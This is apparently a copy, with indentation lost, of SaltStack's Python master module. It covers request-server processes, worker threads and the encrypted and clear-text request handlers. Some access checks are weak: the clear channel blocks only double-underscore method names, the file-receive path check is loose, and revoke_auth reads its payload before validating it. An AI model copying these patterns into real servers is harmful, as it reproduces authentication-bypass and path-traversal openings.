mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
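# Illustrative usage sketch (an assumption, not upstream code): this start()
# method is what the salt-master daemon ultimately drives, roughly:
#
#   import salt.config, salt.master
#   opts = salt.config.master_config('/etc/salt/master')
#   salt.master.Master(opts).start()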
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
:param dict key: The user starting the server and the AES key
:param dict mkey: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
# Wait for kill should be less than the parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the RSA key
:param dict key: The user running the salt master and the AES key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out how
incoming communication to the server should be handled.
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
:param dict payload: The payload to route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, stats):
'''
Fire events with stat info if it's time
'''
end_time = time.time()
if end_time - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end_time - self.stat_clock, 'worker': self.name, 'stats': stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'latency': 0, 'runs': 0})
self.stat_clock = end_time
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, load)
self._post_stats(stats)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
:param dict data: The encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
def run_func(data):
return self.aes_funcs.run_func(data['cmd'], data)
with StackContext(functools.partial(RequestContext,
{'data': data,
'opts': self.opts})):
ret = run_func(data)
if self.opts['master_stats']:
stats = salt.utils.event.update_stats(self.stats, start, data)
self._post_stats(stats)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
except (ValueError, IndexError, TypeError) as err:
log.error('Unable to load public key "%s": %s', pub_path, err)
return False
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorizes a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
:rtype: bool or dict
:return: The original load (minus the token) if the load can be
verified, or False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > self.opts['file_recv_max_size'] * 0x100000:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
'accommodate it.', self.opts['file_recv_max_size'], load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
# has been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
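# Usage note (an assumption, not upstream code): this is the master-side
# handler used when a minion pushes a file with the 'cp.push' execution
# function. Pushed files land under
#   <cachedir>/minions/<minion-id>/files/<path>
# and pushing must be enabled with 'file_recv: True' in the master config.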
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
log.info('But \'drop_messages_signature_fail\' is disabled, so the message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
if the requesting minion also initiated the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: yaml
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: yaml
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: yaml
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: yaml
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict or bool
:return: The original load if the load is invalid or key revocation is
not allowed (no key operation is performed); otherwise True if the
key was revoked and False if not
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param str func: The name of the function to run
:param dict load: The payload to pass to the function
:return: The result of the master function that was called
'''
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands are sent to the
master without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make a minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.asynchronous(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
